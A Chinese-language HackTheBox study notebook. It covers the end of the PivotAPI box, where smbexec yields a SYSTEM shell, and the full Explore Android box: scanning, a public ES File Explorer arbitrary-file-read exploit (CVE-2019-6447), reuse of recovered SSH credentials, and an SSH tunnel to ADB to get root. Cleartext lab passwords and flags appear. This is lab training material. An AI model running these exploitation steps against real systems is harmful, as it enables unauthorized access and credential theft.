[*] Opening SVCManager on 10.129.229.178.....
[*] Creating service glyR on 10.129.229.178.....
[*] Starting service glyR.....
[!] Press help for extra shell commands
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
Microsoft Windows [Versi�n 10.0.17763.1879]
(c) 2018 Microsoft Corporation. Todos los derechos reservados.
C:\Windows\system32> whoami
nt authority\system
C:\Windows\system32>
那么既然可以通过这种方式连接shell,为什么我们在之前不考虑呢?因为权限不够,所以一般不优先选择这种连接方式,如下:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py Jari:'Cos@Chung@!RPG'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/PivotAPI]
└─# psexec.py 3v4Si0N:'Gu4nCh3C4NaRi0N!23'@10.129.229.178
Impacket v0.12.0.dev1+20231114.165227.4b56c18 - Copyright 2023 Fortra
[*] Requesting shares on 10.129.229.178.....
[-] share 'ADMIN$' is not writable.
[-] share 'C$' is not writable.
[-] share 'NETLOGON' is not writable.
[-] share 'SYSVOL' is not writable.
然而我们并没有在这个域管理员的家目录和桌面看到最终的flag:
C:\Windows\system32> cd c:\users\Administrador
c:\Users\administrador> cd Desktop
c:\Users\administrador\Desktop> dir
El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
El n�mero de serie del volumen es: 94DB-AFCA
Directorio de c:\Users\administrador\Desktop
28/04/2021 22:36 <DIR> .
28/04/2021 22:36 <DIR> ..
0 archivos 0 bytes
2 dirs 4.520.017.920 bytes libres
c:\Users\administrador\Desktop> cd ..
c:\Users\administrador> dir
El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
El n�mero de serie del volumen es: 94DB-AFCA
Directorio de c:\Users\administrador
11/08/2020 16:32 <DIR> .
11/08/2020 16:32 <DIR> ..
09/08/2020 16:06 <DIR> 3D Objects
09/08/2020 16:06 <DIR> Contacts
28/04/2021 22:36 <DIR> Desktop
09/08/2020 16:06 <DIR> Documents
10/08/2020 17:21 <DIR> Downloads
09/08/2020 16:06 <DIR> Favorites
09/08/2020 16:06 <DIR> Links
09/08/2020 16:06 <DIR> Music
09/08/2020 16:06 <DIR> Pictures
09/08/2020 16:06 <DIR> Saved Games
09/08/2020 16:06 <DIR> Searches
09/08/2020 16:06 <DIR> Videos
0 archivos 0 bytes
14 dirs 4.520.017.920 bytes libres
但是联想到在LAPS
相关组中,用户cybervaca
也和管理员权限差不多了,可以尝试,并且这个用户名正好是这台机器的作者^w^
c:\Users\administrador> cd ..\cybervaca\Desktop
c:\Users\cybervaca\Desktop> dir
El volumen de la unidad C no tiene etiqueta.
[-] Decoding error detected, consider running chcp.com at the target,
map the result with https://docs.python.org/3/library/codecs.html#standard-encodings
and then execute smbexec.py again with -codec and the corresponding codec
El n�mero de serie del volumen es: 94DB-AFCA
Directorio de c:\Users\cybervaca\Desktop
30/04/2021 09:31 <DIR> .
30/04/2021 09:31 <DIR> ..
10/02/2024 13:19 34 root.txt
1 archivos 34 bytes
2 dirs 4.520.226.816 bytes libres
tc:\Users\cybervaca\Desktop>type root.txt
9f91a2b8bdfab265d51b101db6fe3dc8
最终的flag即9f91a2b8bdfab265d51b101db6fe3dc8
拓展尝试
(待)
总结
(待复盘时总结)
Explore
“红队笔记”学习记录
机器介绍
Explore is an easy difficulty Android machine. Network enumeration reveals a vulnerable service that is exploitable via a Metasploit module, and gives restricted read access to the machine. Further enumeration of the files, reveals the SSH credentials of a system user, allowing this way remote access to the machine. Finally, the attacker is able to forward a filtered port locally using SSH tunneling, in order to access the Android shell over the Android Debug Bridge (ADB). This eventuality allows the attacker to execute commands as the root user.
探索是一个容易难度的Android机器。网络枚举揭示了可通过 Metasploit 模块利用的易受攻击的服务,并提供对计算机的有限读取访问权限。进一步枚举文件,显示系统用户的 SSH 凭据,从而允许以这种方式远程访问计算机。最后,攻击者能够使用 SSH 隧道在本地转发过滤的端口,以便通过 Android 调试桥 (ADB) 访问 Android shell。这种可能性允许攻击者以 root 用户身份执行命令。
难度
Easy
信息搜集
tcp全端口扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT --min-rate 10000 -p- $ip1 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-12 16:17 CST
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 11.98% done; ETC: 16:18 (0:01:13 remaining)
Stats: 0:00:22 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 26.79% done; ETC: 16:18 (0:01:03 remaining)
Nmap scan report for 10.129.230.80 (10.129.230.80)
Host is up (0.19s latency).
All 65535 scanned ports on 10.129.230.80 (10.129.230.80) are in ignored states.
Not shown: 64652 filtered tcp ports (no-response), 883 closed tcp ports (conn-refused)
Nmap done: 1 IP address (1 host up) scanned in 87.29 seconds
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --min-rate 10000 -p- 10.129.178.12 -oA nmapscan/ports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:32 CST
Warning: 10.129.178.12 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.29s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
15262/tcp filtered unknown
30972/tcp filtered unknown
32708/tcp filtered unknown
33415/tcp filtered unknown
35169/tcp open unknown
42135/tcp open unknown
59777/tcp open unknown
62324/tcp filtered unknown
64451/tcp filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 12.24 seconds
这里尝试分别指定-sT
和不指定,结果指定了反而扫描不出来,所以nmap扫描有时候不是死板的,要多尝试
将结果筛选出端口进行数据处理一下,方便后续使用:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ports=$(grep /tcp nmapscan/ports.nmap | awk -F'/' '{print $1}' | paste -sd ',')
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# echo $ports
2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451
tcp详细扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sT -sC -sV -O -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/tcports
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:50 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
2222/tcp open ssh (protocol 2.0)
| ssh-hostkey:
|_ 2048 71:90:e3:a7:c9:5d:83:66:34:88:3d:eb:b4:c7:88:fb (RSA)
| fingerprint-strings:
| NULL:
|_ SSH-2.0-SSH Server - Banana Studio
5555/tcp filtered freeciv
15262/tcp closed unknown
30972/tcp closed unknown
32708/tcp closed unknown
33415/tcp closed unknown
35169/tcp closed unknown
42135/tcp open http ES File Explorer Name Response httpd
|_http-title: Site doesn't have a title (text/html).
59777/tcp open http Bukkit JSONAPI httpd for Minecraft game server 3.6.0 or older
|_http-title: Site doesn't have a title (text/plain).
62324/tcp closed unknown
64451/tcp closed unknown
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port2222-TCP:V=7.94SVN%I=7%D=2/20%Time=65D44BD2%P=x86_64-pc-linux-gnu%r
SF:(NULL,24,"SSH-2\.0-SSH\x20Server\x20-\x20Banana\x20Studio\r\n");
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=2/20%OT=2222%CT=15262%CU=44075%PV=Y%DS=2%DC=I%G=Y%T
OS:M=65D44BEB%P=x86_64-pc-linux-gnu)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=A
OS:)SEQ(SP=105%GCD=1%ISR=109%TI=Z%CI=Z%TS=C)SEQ(SP=105%GCD=1%ISR=109%TI=Z%C
OS:I=Z%II=I%TS=A)SEQ(SP=106%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M53CST
OS:11NW6%O2=M53CST11NW6%O3=M53CNNT11NW6%O4=M53CST11NW6%O5=M53CST11NW6%O6=M5
OS:3CST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)ECN(R=Y%DF=Y%
OS:T=40%W=FFFF%O=M53CNNSNW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
OS:T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=
OS:40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0
OS:%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=1
OS:64%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: Device: phone
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 35.12 seconds
udp扫描:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap -sU --top-ports 1000 10.129.178.12 -oA nmapscan/udpors
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:24 CST
Stats: 0:04:10 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:03 remaining)
Stats: 0:04:11 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 25.70% done; ETC: 14:40 (0:12:06 remaining)
Stats: 0:14:35 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 79.06% done; ETC: 14:43 (0:03:52 remaining)
Stats: 0:18:55 elapsed; 0 hosts completed (1 up), 1 undergoing UDP Scan
UDP Scan Timing: About 99.99% done; ETC: 14:43 (0:00:00 remaining)
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.28s latency).
Not shown: 992 closed udp ports (port-unreach)
PORT STATE SERVICE
1900/udp open|filtered upnp
3130/udp open|filtered squid-ipc
5353/udp open|filtered zeroconf
6050/udp open|filtered x11
18985/udp open|filtered unknown
21948/udp open|filtered unknown
36458/udp open|filtered unknown
49306/udp open|filtered unknown
Nmap done: 1 IP address (1 host up) scanned in 1150.51 seconds
脚本漏扫:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nmap --script=vuln -p 2222,5555,15262,30972,32708,33415,35169,42135,59777,62324,64451 10.129.178.12 -oA nmapscan/vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-02-20 14:42 CST
Nmap scan report for 10.129.178.12 (10.129.178.12)
Host is up (0.37s latency).
PORT STATE SERVICE
2222/tcp open EtherNetIP-1
5555/tcp filtered freeciv
15262/tcp closed unknown
30972/tcp closed unknown
32708/tcp closed unknown
33415/tcp closed unknown
35169/tcp closed unknown
42135/tcp open unknown
59777/tcp open unknown
62324/tcp closed unknown
64451/tcp closed unknown
Nmap done: 1 IP address (1 host up) scanned in 18.72 seconds
扫描结果分析
首先从nmap扫描结果显示设备可能是phone
,然后2222
端口运行的ssh服务器(开发者单位可能叫Banana Studio),42135
端口运行ES文件浏览器,这是安卓系统很常用的软件,59777
端口运行一种Minecraft
游戏对应的JSONAPI,在这里暂时还没有啥思路,可以先对这几个陌生的名字搜索一下:
拨开云雾见月明
证实了我们的猜想
搜索freeciv
:
了解到是freeciv
用于创建游戏多用户服务器的 ,但通常该端口也可能用于Android Debug Bridge
(ADB),实际上是一个shell,并且该端口被过滤,是ADB的可能性比较大。
注意:在搜索过程中,一定要把所有与其相关的独特的关键字结合在一起搜索,这样才会更精准
利用
寻找公开漏洞
接下来可以根据已经找到的潜在攻击面-端口暴露的应用程序,来寻找潜在的公开漏洞,可以先通过searchsploit
再通过搜索引擎或github等:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana studio
Exploits: No Results
Shellcodes: No Results
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit banana
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Banana Dance - Cross-Site Scripting / SQL Injection | php/webapps/37646.txt
banana dance b.2.6 - Multiple Vulnerabilities | php/webapps/23573.txt
Banana Dance CMS and Wiki - SQL Injection | php/webapps/17919.txt
Bananadance Wiki b2.2 - Multiple Vulnerabilities | php/webapps/22654.txt
Cisco ASA / PIX - 'EPICBANANA' Local Privilege Escalation | hardware/local/40271.txt
Hot Banana Web Content Management Suite 5.3 - Cross-Site Scripting | cfm/webapps/26882.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
显然和我们遇到的情况不匹配,换一个程序的关键词:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit ES File Explorer
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Dooblou WiFi File Explorer 1.13.3 - Multiple Vulnerabilities | php/webapps/51615.txt
ES File Explorer 4.1.9.7.4 - Arbitrary File Read | android/remote/50070.py
iOS iFileExplorer Free - Directory Traversal | ios/remote/16278.py
MetaProducts Offline Explorer 1.x - FileSystem Disclosure | windows/remote/20488.txt
Microsoft Internet Explorer - NCTAudioFile2.AudioFile ActiveX Remote Stack Overflow (2) | windows/remote/3808.html
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (1) | windows/remote/24495.rb
Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009) (Metasploit) (2) | windows/remote/24538.rb
Microsoft Internet Explorer - textNode Use-After-Free (MS13-037) (Metasploit) | windows/remote/25999.rb
Microsoft Internet Explorer / MSN - ICC Profiles Crash (PoC) | windows/dos/1110.txt
Microsoft Internet Explorer 4.x/5 / Outlook 2000 0/98 0/Express 4.x - ActiveX '.CAB' File Execution | windows/remote/19603.txt
Microsoft Internet Explorer 4/5 - DHTML Edit ActiveX Control File Stealing / Cross Frame Access | windows/remote/19094.txt
Microsoft Internet Explorer 5 - ActiveX Object For Constructing Type Libraries For Scriptlets File Write | windows/remote/19468.txt
Microsoft Internet Explorer 5 / Firefox 0.8 / OmniWeb 4.x - URI Protocol Handler Arbitrary File Creation/Modification | windows/remote/24116.txt
Microsoft Internet Explorer 5/6 - 'file://' Request Zone Bypass | windows/remote/22575.txt
Microsoft Internet Explorer 6 - '%USERPROFILE%' File Execution | windows/remote/22734.html
Microsoft Internet Explorer 6 - Local File Access | windows/remote/29619.html
Microsoft Internet Explorer 7 - Arbitrary File Rewrite (MS07-027) | windows/remote/3892.html
My File Explorer 1.3.1 iOS - Multiple Web Vulnerabilities | ios/webapps/28975.txt
WebFileExplorer 3.6 - 'user' / 'pass' SQL Injection | php/webapps/35851.txt
--------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
显然第二个匹配,虽然不知道具体版本,但是可以尝试,先将对应的exp下载下来:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# searchsploit -m 50070
Exploit: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
URL: https://www.exploit-db.com/exploits/50070
Path: /usr/share/exploitdb/exploits/android/remote/50070.py
Codes: CVE-2019-6447
Verified: False
File Type: Python script, ASCII text executable
Copied to: /home/cvestone/Desktop/htb/Explore/50070.py
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ls
10.129.178.12.gnmap 10.129.178.12.nmap 10.129.178.12.xml 50070.py Explore.pdf nmapscan
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# head -n 20 50070.py
# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read
# Date: 29/06/2021
# Exploit Author: Nehal Zaman
# Version: ES File Explorer v4.1.9.7.4
# Tested on: Android
# CVE : CVE-2019-6447
import requests
import json
import ast
import sys
if len(sys.argv) < 3:
print(f"USAGE {sys.argv[0]} <command> <IP> [file to download]")
sys.exit(1)
url = 'http://' + sys.argv[2] + ':59777'
cmd = sys.argv[1]
cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo']
listCmds = cmds[:9]
ES File Explorer任意文件读取
这是利用任意文件读取
漏洞的exp,从源码中可以知道用法,试着执行:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getDeviceInfo 10.129.178.12
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : VMware Virtual Platform
ftpRoot : /sdcard
ftpPort : 3721
#先查看所有的图片文件,而不是列出所有文件,因为太多了不优先考虑
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py listPics 10.129.178.12
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
name : concept.jpg
time : 4/21/21 02:38:08 AM
location : /storage/emulated/0/DCIM/concept.jpg
size : 135.33 KB (138,573 Bytes)
name : anc.png
time : 4/21/21 02:37:50 AM
location : /storage/emulated/0/DCIM/anc.png
size : 6.24 KB (6,392 Bytes)
name : creds.jpg
time : 4/21/21 02:38:18 AM
location : /storage/emulated/0/DCIM/creds.jpg
size : 1.14 MB (1,200,401 Bytes)
name : 224_anc.png
time : 4/21/21 02:37:21 AM
location : /storage/emulated/0/DCIM/224_anc.png
size : 124.88 KB (127,876 Bytes)
在这里发现creds.jpg
是最令我们感兴趣的,而其他的在读取之后感觉并没有太多利用价值,可以下载该图片:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# python3 50070.py getFile 10.129.178.12 /storage/emulated/0/DCIM/creds.jpg
==================================================================
| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |
| Coded By : Nehal a.k.a PwnerSec |
==================================================================
[+] Downloading file...
[+] Done. Saved as `out.dat`.
看着像一个凭据,先记录下来:kristi:Kr1sT!5h@Rp3xPl0r3!
但是这里的大小写存在判断失误的可能性,所以如果错误要记得多尝试不同可能性,接下来显然可以尝试是否是ssh的凭据
获取立足点
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh kristi@10.129.178.12 -p 2222
Unable to negotiate with 10.129.178.12 port 2222: no matching host key type found. Their offer: ssh-rsa
这个错误通常表示SSH客户端和服务器之间无法达成一致的加密算法和主机密钥类型,从而导致连接失败。因此,可以尝试使用SSH客户端命令中的"-o"选项,指定与服务器提供的主机密钥类型匹配的算法
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -oHostKeyAlgorithms=ssh-rsa kristi@10.129.178.12 -p 2222
The authenticity of host '[10.129.178.12]:2222 ([10.129.178.12]:2222)' can't be established.
RSA key fingerprint is SHA256:3mNL574rJyHCOGm1e7Upx4NHXMg/YnJJzq+jXhdQQxI.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[10.129.178.12]:2222' (RSA) to the list of known hosts.
Password authentication
(kristi@10.129.178.12) Password:
127|:/ $ whoami
u0_a76
:/ $ uname -a
Linux localhost 4.9.214-android-x86_64-g04f9324 #1 SMP PREEMPT Wed Mar 25 17:11:29 CST 2020 x86_64
:/ $ id
uid=10076(u0_a76) gid=10076(u0_a76) groups=10076(u0_a76),3003(inet),9997(everybody),20076(u0_a76_cache),50076(all_a76) context=u:r:untrusted_app:s0:c76,c256,c512,c768
显然这是个普通用户,看看都有啥文件:
:/ $ ls -liah
total 1.4M
5231 drwxrwxrwt 15 root root 980 2024-02-19 22:42 .
5231 drwxrwxrwt 15 root root 980 2024-02-19 22:42 ..
1 dr-xr-xr-x 52 root root 0 2024-02-19 22:42 acct
5240 lrwxrwxrwx 1 root root 11 2024-02-19 22:42 bin -> /system/bin
5241 lrwxrwxrwx 1 root root 50 2024-02-19 22:42 bugreports -> /data/user_de/0/com.android.shell/files/bugreports
5575 drwxrwx--- 6 system cache 120 2024-02-19 22:42 cache
5243 lrwxrwxrwx 1 root root 13 2024-02-19 22:42 charger -> /sbin/charger
5519 drwxr-xr-x 3 root root 0 2024-02-19 22:42 config
5245 lrwxrwxrwx 1 root root 17 2024-02-19 22:42 d -> /sys/kernel/debug
163842 drwxrwx--x 37 system system 4.0K 2021-03-15 16:49 data
5247 -rw------- 1 root root 1.0K 2024-02-19 22:42 default.prop
5304 drwxr-xr-x 16 root root 2.6K 2024-02-19 22:42 dev
5249 lrwxrwxrwx 1 root root 11 2024-02-19 22:42 etc -> /system/etc
5250 -rw-r----- 1 root root 753 2024-02-19 22:42 fstab.android_x86_64
5251 -rwxr-x--- 1 root root 2.2M 2024-02-19 22:42 init
5252 -rwxr-x--- 1 root root 3.3K 2024-02-19 22:42 init.android_x86_64.rc
5253 -rwxr-x--- 1 root root 1.0K 2024-02-19 22:42 init.environ.rc
5254 -rwxr-x--- 1 root root 29K 2024-02-19 22:42 init.rc
5255 -rwxr-x--- 1 root root 582 2024-02-19 22:42 init.superuser.rc
5256 -rwxr-x--- 1 root root 7.5K 2024-02-19 22:42 init.usb.configfs.rc
5257 -rwxr-x--- 1 root root 5.5K 2024-02-19 22:42 init.usb.rc
5258 -rwxr-x--- 1 root root 511 2024-02-19 22:42 init.zygote32.rc
5259 -rwxr-x--- 1 root root 875 2024-02-19 22:42 init.zygote64_32.rc
5404 lrwxrwxrwx 1 root root 10 2024-02-19 22:42 lib -> system/lib
5311 drwxr-xr-x 11 root system 240 2024-02-19 22:42 mnt
5261 drwxr-xr-x 2 root root 220 2024-02-19 22:42 odm
5271 drwxr-xr-x 2 root root 40 2024-02-19 22:42 oem
5272 -rw-r--r-- 1 root root 23K 2024-02-19 22:42 plat_file_contexts
5273 -rw-r--r-- 1 root root 7.0K 2024-02-19 22:42 plat_hwservice_contexts
5274 -rw-r--r-- 1 root root 6.5K 2024-02-19 22:42 plat_property_contexts
5275 -rw-r--r-- 1 root root 1.2K 2024-02-19 22:42 plat_seapp_contexts
5276 -rw-r--r-- 1 root root 14K 2024-02-19 22:42 plat_service_contexts
1 dr-xr-xr-x 184 root root 0 2024-02-19 22:42 proc
5278 lrwxrwxrwx 1 root root 15 2024-02-19 22:42 product -> /system/product
5279 drwxr-x--- 2 root root 140 2024-02-19 22:42 sbin
5285 lrwxrwxrwx 1 root root 21 2024-02-19 22:42 sdcard -> /storage/self/primary
5286 -rw-r--r-- 1 root root 357K 2024-02-19 22:42 sepolicy
5534 drwxr-xr-x 4 root root 80 2024-02-19 22:42 storage
1 dr-xr-xr-x 12 root root 0 2024-02-19 22:42 sys
2 drwxr-xr-x 18 root root 4.0K 2020-03-25 00:12 system
5290 -rw-r--r-- 1 root root 464 2024-02-19 22:42 ueventd.android_x86_64.rc
5291 -rw-r--r-- 1 root root 5.0K 2024-02-19 22:42 ueventd.rc
5292 lrwxrwxrwx 1 root root 14 2024-02-19 22:42 vendor -> /system/vendor
5293 -rw-r--r-- 1 root root 6.9K 2024-02-19 22:42 vendor_file_contexts
5294 -rw-r--r-- 1 root root 0 2024-02-19 22:42 vendor_hwservice_contexts
5295 -rw-r--r-- 1 root root 392 2024-02-19 22:42 vendor_property_contexts
5296 -rw-r--r-- 1 root root 0 2024-02-19 22:42 vendor_seapp_contexts
5297 -rw-r--r-- 1 root root 0 2024-02-19 22:42 vendor_service_contexts
5298 -rw-r--r-- 1 root root 65 2024-02-19 22:42 vndservice_contexts
像是linux根目录下的目录结构,但是有些不同,并没有找到home
目录,试着查看几个感兴趣的目录:
:/ $ ls -liah data
ls: data: Permission denied
1|:/ $ ls -liah sdcard
5285 lrwxrwxrwx 1 root root 21 2024-02-19 22:42 sdcard -> /storage/self/primary
:/ $ cd /storage/self/primary
:/storage/self/primary $ ls -liah
total 34K
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 .
172116 drwx--x--x 4 root everybody 4.0K 2021-03-13 17:16 ..
181241 drwxrwx--- 5 root everybody 4.0K 2021-03-13 17:30 .estrongs
180902 -rw-rw---- 1 root everybody 72 2024-02-19 22:43 .userReturn
180804 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Alarms
180773 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:16 Android
180809 drwxrwx--- 2 root everybody 4.0K 2021-04-21 02:38 DCIM
180808 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:37 Download
180807 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Movies
180801 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Music
180805 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Notifications
180806 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Pictures
180802 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Podcasts
180803 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:16 Ringtones
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 backups
188491 drwxrwx--- 2 root everybody 4.0K 2021-04-21 02:12 dianxinos
180731 -rw-rw---- 1 root everybody 33 2021-03-13 18:28 user.txt
我们在挂载的sdcard
对应路径中发现了user.txt
:
:/storage/self/primary $ cat user.txt
f32017174c7c7e8f50c6da52891ae250
我们还发现了一个感兴趣的backups
目录:
:/storage/self/primary $ cd backups
:/storage/self/primary/backups $ ls -liah
total 6.0K
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 .
180766 drwxrwx--- 15 root everybody 4.0K 2021-04-21 02:12 ..
188898 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:30 apps
:/storage/self/primary/backups $ cd apps
:/storage/self/primary/backups/apps $ ls -liah
total 4.0K
188898 drwxrwx--- 2 root everybody 4.0K 2021-03-13 17:30 .
188897 drwxrwx--- 3 root everybody 4.0K 2021-03-13 17:30 ..
然而并没有任何内容,继续寻找其他可能的有兴趣路径,虽然这是androd,但是我们也可以尝试在寻找linux提权时的可能攻击路径,多次尝试后并没有发现太多感兴趣的东西,确切来说是没什么经验所以找不到
初探ADB
从之前的端口扫描结果来看,虽然nmap扫描的5555
端口对应服务可能是freeciv
,但也有很大可能性是ADB
,由于我们的目的是权限提升,ADB
又必须要最高权限才能正常使用,因此优先考虑尝试利用ADB
,先查看5555端口的具体情况:
:/ $ ss -tln
State Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0 50 *:2222 *:*
LISTEN 0 8 [::ffff:127.0.0.1]:35955 *:*
LISTEN 0 4 *:5555 *:*
LISTEN 0 10 *:42135 *:*
LISTEN 0 50 [::ffff:10.129.178.12]:40471 *:*
LISTEN 0 50 *:59777 *:*
可以知道5555
端口在目标机器内部确实处于监听状态,而外部的nmap扫描时显示被过滤,此时我们可以尝试,这也间接说明这个端口和ADB的高价值,否则没有必要过滤和隐藏,我们还可以尝试用本地的adb工具或nc连接目标,作为验证的手段:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 10.129.178.12
failed to connect to '10.129.178.12:5555': Connection timed out
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# nc 10.129.178.12 5555
Ncat: TIMEOUT.
两种方式都连接超时
ssh端口转发
但是我们已经拿到了目标的普通用户shell,我们完全可以通过ssh隧道的端口转发方式来绕过该过滤:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# ssh -L 5555:localhost:5555 kristi@10.129.178.12 -p 2222 -oHostKeyAlgorithms=ssh-rsa
Password authentication
(kristi@10.129.178.12) Password:
:/ $
这是将目标的本地端口5555转发到我们kali的本地端口5555
远程连接ADB
重新尝试连接ADB,此时发现能连接上了:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb connect 127.0.0.1
connected to 127.0.0.1:5555
权限提升
既然连接上ADB,就可以尝试返回shell然后直接提权了:
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/Explore]
└─# adb shell
x86_64:/ $ whoami
shell
x86_64:/ $ id
uid=2000(shell) gid=2000(shell) groups=2000(shell),1004(input),1007(log),1011(adb),1015(sdcard_rw),1028(sdcard_r),3001(net_bt_admin),3002(net_bt),3003(inet),3006(net_bw_stats),3009(readproc),3011(uhid) context=u:r:shell:s0
x86_64:/ $ su
:/ # whoami
root
:/ # cd data
:/data # ls
adb bootchart media property tombstones
anr cache mediadrm resource-cache user
app dalvik-cache misc root.txt user_de
